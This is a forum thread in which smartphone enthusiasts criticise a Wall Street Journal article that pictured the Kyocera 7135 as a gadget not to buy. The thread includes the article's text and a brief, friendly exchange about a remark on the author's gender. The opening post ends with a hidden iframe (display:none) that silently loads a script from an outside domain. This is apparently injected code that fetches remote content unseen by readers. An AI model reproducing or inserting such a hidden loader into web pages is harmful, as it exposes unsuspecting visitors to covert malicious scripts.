+ Reply to Thread
Page 1 of 2 1 2 LastLast

Wall Street Journal Rips 7135

Has anyone seen yesterdays article in hte WSJ? Front page of the Personal section showed a full size picture of the 7135 with a HUGE caption saying "Gadgets Not to Buy." I believe their thinking was that newer and better devices will be available (in a few years).
    How Absurd??!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

WSJ is a POS. Read Financial Times.
    ---------------
    The same thing we do every night, Pinky...

Was it Mossberg that wrote it? I've read that section for as long as there has been smartphones, and their opinions are no more credible to me than the ones at places like CNET and ZD Net. I would like to know what devices all of these "critics" use in their everyday lives (by their own choice). I don't care what "better" devices will be available in a couple years when I need something now.
    Please visit my picture site: Robert-O-Rama :)

Exactly. How long do these devices last anyway? In a couple of years, I'm sure I will be drooling for the latest gadget (with built-in blue tooth, live streaming high res video, twice as thin and half the price), but that has nothing to do with what my needs are today.
    Sorry, I promptly threw the paper in the trash, so I do not know what bozo wrote it.

I grabbed a copy out of our library. It was by "Pui-Wing Tam". The criticisms of "combination phones" focus on PPC devices and their battery drain. "Why you should wait to buy: Many of these phones, particularly Pocket PC Phone Editions, are clunky and pricey, and burn through battery power." The Treo is given as a well-known example of combination phones. The Kyocera is, of course, neither clunky or particularly power-hungry in comparison to a cellphone. Pricey is in the eye of the beholder, but this article is a good example of why I say again:

WSJ is a POS. Read Financial Times.
    ---------------
    The same thing we do every night, Pinky...

Originally posted by Robert K.
    Was it Mossberg that wrote it? I've read that section for as long as there has been smartphones, and their opinions are no more credible to me than the ones at places like CNET and ZD Net. I would like to know what devices all of these "critics" use in their everyday lives (by their own choice). I don't care what "better" devices will be available in a couple years when I need something now.
    I did not see the article but a colleague of mine did and he reports that, first, it was NOT written by Mossberg. It was written by some female (he doesn't recall the name). Secondly, even though the 7135 was pictured at the beginning of the article, the 7135 was never even mentioned in the article. The article was dissing convergence devices in general on the following basis:

a. Too new and still rough around the edges
    b. Too big and bulky
    c. The price will drop if you wait a while.

I think we can all agree that "c" is certainly true, but hey, if you follow that advise, you would never buy anything as the price for most electronic things fall over time. Argument "b" is personal preference, however in my opinion the new generation of smartphones are not big and bulky and the 7135 in particular is a HUGE (no pun intended) improvement in size over the 6035. The only argument that I would say may be correct is "a". If I look at smartphones from the perspective of average Joe consumer, not from the perspective of people who spend all their idle time reading smartphonesource.com, I would have to agree there is probably still considerable room for improvement in performance and reliability of convergence devices. However, I could say the same thing about computers. God knows there is room for improvement in performance and especially in reliability in PC's, but has that stopped people from buying them? Of course not.

All-in-all, my colleague (and his wife) both concluded, quite on their own, that it was a stupid review and not worth the price of the paper it was printed on.
    Dave

Just so that we're clear, how much is the paper that it was printed on worth?

I saw the article, too...

I was wondering if someone might comment on that article here. I saw it yesterday. I agree with Dave/dwod's points a, b and c and would like to point out the the article's author that I find the 7135 (which I received yesterday) to be far less "big and bulky" than carrying around separate PDA, phone and MP3 player. The article was pretty dumb, and I agree that the Financial Times is an excellent newspaper. I read it consistently for a few years. But one dumb article doesn't necessarily make the WSJ a lousy newspaper.

Only thing in Dave's remarks that I took a bit of exception to was the "some female" comment at the beginning. This is only my second time posting here (I had been reading the speculation thread daily for 6 months) and one of the reasons I have held back is because this is such a boys' club. I have nothing against boys (I like them plenty!), I just hope we can play nice together. I feel like enough of an oddball that I am the only woman among my female friends that is into tech and toys. Please keep an open mind toward us, OK?

Yvette

Well put, though maybe he meant it the same way as saying "some guy" (at least I would hope so). Using the specific word "female" did sound a little degrading. How 'bout it dwdod?

More Gadgets Hit Shelves,
    But Many Are Half-Baked

By PUI-WING TAM
    Staff Reporter of THE WALL STREET JOURNAL

Sean Mills, eager to have the newest gadgetry, decided to plunk down $500 for a combined phone and hand-held computer. He liked its versatility, but soon soured on the device: It sagged and bulged in his pocket (a fashion faux pas), and the screen images were frustratingly grainy.

"When you're buying this kind of stuff, you always wish you'd waited a little longer," says Mr. Mills. He has since dumped the phone.

The tech industry, trying to pull out of a slump, is doing all it can to prod consumers like Mr. Mills into the stores. Many companies that used to introduce one or two devices a year are now pumping out twice that number. In the combo phone category alone, there are now 15 different models for sale, up from fewer than five two years ago. Each new gadget, from hand-held computers to digital cameras, is pitched as more feature-laden, faster and sleeker than the last.

As a result, deciding when to buy a new gadget has never been more complex. Nokia Corp., for example, is about to begin shipping its N-Gage phone around the world. A combined mobile phone and game-playing gadget, the N-Gage isn't particularly intuitive to use. Before plugging a game cartridge into the phone, you have to remove the phone battery. "That's inherently flawed," says Kevin Burden, an analyst at International Data Corp. Nokia says this is a safety feature; people who yank out game cartridges while the power is still on could wipe out the phone's memory.

So when is the right time to jump in? It can depend on the gadget -- some, like "smart displays," which let you access the Web as you walk around your home, will see prices fall gradually over the next 12 to 18 months. But prices for some of the latest home wireless equipment will likely slide as early as the end of the year. Often, the sweet spot for consumers is about three years after a new product lands in stores, analysts say.

Another indicator: While the marketing hype tends to emphasize all the latest bells and whistles, it often makes sense to wait until the number of new features being added to the gadget plateaus. By that time, the gadget's capabilities have been fully fleshed out, which helps trigger the price war.

The electronics industry can't really afford to slow down the pace. Sales, while still growing, are flattening. The Consumer Electronics Association predicts sales will increase 3% this year, compared with 6% annual growth from 1998 to 2002. Total sales have been helped by the number of new devices that have hit the market. But many of these "are still just half-cooked" when they landed on the shelves, says Rob Enderle, an analyst at Giga Information Services.

Here are five categories of new gizmos, from printers that double as fax machines and picture scanners, to digital video recorders for the couch potato, that you should hold off on:

Smart Displays

What they are: Essentially portable computer monitors that connect wirelessly to your PC and can access e-mail, the Internet and other applications from anywhere in the house. (These pieces of hardware use Wi-Fi, the popular wireless technology.)

What's the appeal: You've got the features of a PC, without all the cord tangle. One caveat: You can't wander too far from your computer or you might lose the connection with the PC.

Why you should wait to buy: You've got only a few models to choose from at this point -- and the prices are hefty, from $999 up to $1,499. For that money, you might as well get a full-featured laptop. Some analysts expect prices to drop by half in the next 12 to 18 months, and anticipate improvements in the picture quality of screens as well.

Next-Generation Wireless Home Networks

What are they: The technology known as Wi-Fi, which lets you spread the use of a single Internet connection wirelessly to multiple PCs and laptops in the same house, has been a big seller. Now, tech companies are rolling out new versions that are much faster.

What's the appeal: The new wireless formats (known as 802.11a and 802.11g) are five times as speedy as the old. That means something like downloading video files is actually feasible.

Why you should wait to buy: The old version of Wi-Fi isn't compatible with some of the new ones, so mixing and matching gear is difficult. Beyond that, one of the new versions, 802.11g, isn't officially a wireless standard yet, so consumers may have to download software to update their equipment once the standard is ratified later this year.

Next-Generation Combination Phones

What they are: Cellphones that have secondary functions -- they're also personal organizers, videogame players or digital cameras. Handspring Inc.'s Treo is one of the better-known models.

What's the appeal: You no longer have to cram a handful of different devices into your work bag.

Why you should wait to buy: Many of these phones, particularly Pocket PC Phone Editions, are clunky and pricey, and burn through battery power. "It's going to be another nine months or so before folks should get serious about these phones," says Todd Kort, an analyst at research firm Gartner Inc.

Digital Video Recorders

What they are: These machines, slightly larger than a cable box, can prerecord dozens of hours of a TV programming and even pause live broadcasts. The best known: ReplayTV from SonicBlue Inc. and TiVo from TiVo Inc.

What's the appeal: Whether you're out for the night or just need a bathroom break, you won't miss your favorite sitcoms. Unlike a garden-variety videocassette recorder, which is also capable of recording TV programs, these players also let you bypass the ads in between.

Why you should wait to buy: The prices have been falling, but should continue to tumble. Now, only about 3% of U.S. homes have these devices. As those numbers pick up, prices may really slide. A TiVo with 80 hours of programming is currently priced at $399, with a monthly service fee of $12.95 or a one-time fee of $299.

Expect big leaps in innovation as well. Increasingly, you'll be able to get cable TV and digital-video-recorder functions in one box, rather than two. There are some combination boxes now on the market, but they are still fairly limited in what they can do.

A more pragmatic reason for holding off, at least with ReplayTV: SonicBlue recently declared Chapter 11 bankruptcy and is selling off some of its assets.

Multifunction Printers

What they are: Known as all-in-ones, these machines can print, fax and scan documents.

What's the appeal: Reduces the clutter of extra machines. They also offer shutterbugs some neat options. You can, for example, plug a digital camera into the printer, print out a proof sheet, mark the proofs you like with a pencil, pop the sheet back into the machine and out come the prints you designated.

Why you should wait to buy: The technology is fairly far along, so price is the main reason to be patient. Heavyweight Dell Computer Corp. introduced its first multifunction printer last month for $109, after rebate. That could spark a price war with the $200 all-in-one printers from other manufacturers.

Write to Pui-Wing Tam at pui-wing.tam@wsj.com

hope so

I hope he meant it that way, GalenMD. Maybe he did. I am absolutely not trying to start any negative stuff here. This is a great forum. Just hoping to keep things friendly and making you "guys" aware that there are some "girls" out here, too. And some of us actually like toys, too.

Among friends...

:topic-off

Hi, Yvette,

Please don't read Dave's description as anything other than descriptive - substitute "some guy" for "some female" and I don't think there's an agenda there. Same implication that the author was not a tech nut like all of us here

I suggest you give the benefit of the doubt to Dave - he's a prolific poster here and, very helpful to one and all - and after all, we're all the same when it comes to spending way too much time on the 7135.

BTW, Beryl and Maritza come to mind as two who post here often, and Jazz is the administrator. All of the female persuasion, and all first rate techies.

To paraphrase Richard Feynman: Gender's not important. Smartphones are.

Hope you get as much out of this board as I do.

Ken

thanks

OK, thank you, kenf. Appreciate it. Sorry to take this off topic, and will drop this so we can return to more interesting things.

I like toys and girls.

Re: I saw the article, too...

Originally posted by yippie
    Only thing in Dave's remarks that I took a bit of exception to was the "some female" comment at the beginning. This is only my second time posting here (I had been reading the speculation thread daily for 6 months) and one of the reasons I have held back is because this is such a boys' club. I have nothing against boys (I like them plenty!), I just hope we can play nice together. I feel like enough of an oddball that I am the only woman among my female friends that is into tech and toys. Please keep an open mind toward us, OK?

Yvette
    Hi Yvette,

Please accept my apology. I did not mean to imply the article was dumb because it was written by a female (even if it came across that way). I only meant to imply that my colleage who read the article did not recall the author's name but did recall that the author was female and therefore realized that Mossberg did not author it. None-the-less I can see how my comments might have been taken the way you took them and again, please accept my apology. Personally, I really like the fact that smartphonesource is "co-ed" and while women are less well represented in numbers here, their valuable contributions make up for their lack of numbers in there importance and quality .

I look forward to your active participation.
    Dave

Re: Among friends...

Originally posted by kenf
    :topic-off

To paraphrase Richard Feynman: Gender's not important. Smartphones are.

Ken
    Yea, but Richard Feynman has been accused of being sexist too!
    Dave

Re: Re: I saw the article, too...

Originally posted by dwdod
    Hi Yvette,

Please accept my apology. I did not mean to imply the article was dumb because it was written by a female (even if it came across that way). I only meant to imply that my colleage who read the article did not recall the author's name but did recall that the author was female and therefore realized that Mossberg did not author it. None-the-less I can see how my comments might have been taken the way you took them and again, please accept my apology. Personally, I really like the fact that smartphonesource is "co-ed" and while women are less well represented in numbers here, their valuable contributions make up for their lack of numbers in there importance and quality .

I look forward to your active participation.
    Oh, thanks, Dave. That was really nice; thanks for taking the time to reply. I am looking forward to hanging out here more, now that I have my 7135 and am trying to learn how to get the most out of it. Thanks also for being so straightforward in your response. Glad you weren't mad at me. I have nothing but goodwill and respect toward everyone here. (And I'm positively glowing since I got my 7135 yesterday....)

Re: Re: Re: I saw the article, too...

And I'm positively glowing since I got my 7135 yesterday....)
    Reminds me of an incident once (after another one of my unfortunate verbal faux pas) when my wife informed me that women don't perspire, they glow... :p
    Dave

Your wife is absolutely right.

Re: Re: Re: I saw the article, too...

Oh, thanks, Dave. Glad you weren't mad at me.

(And I'm positively glowing since I got my 7135 yesterday....)
    Dave might not be mad at you.......... but I am

Ok, no I'm not :p

I'm glad that you decided to start being part of the action here :clap
    Please visit my picture site: Robert-O-Rama :)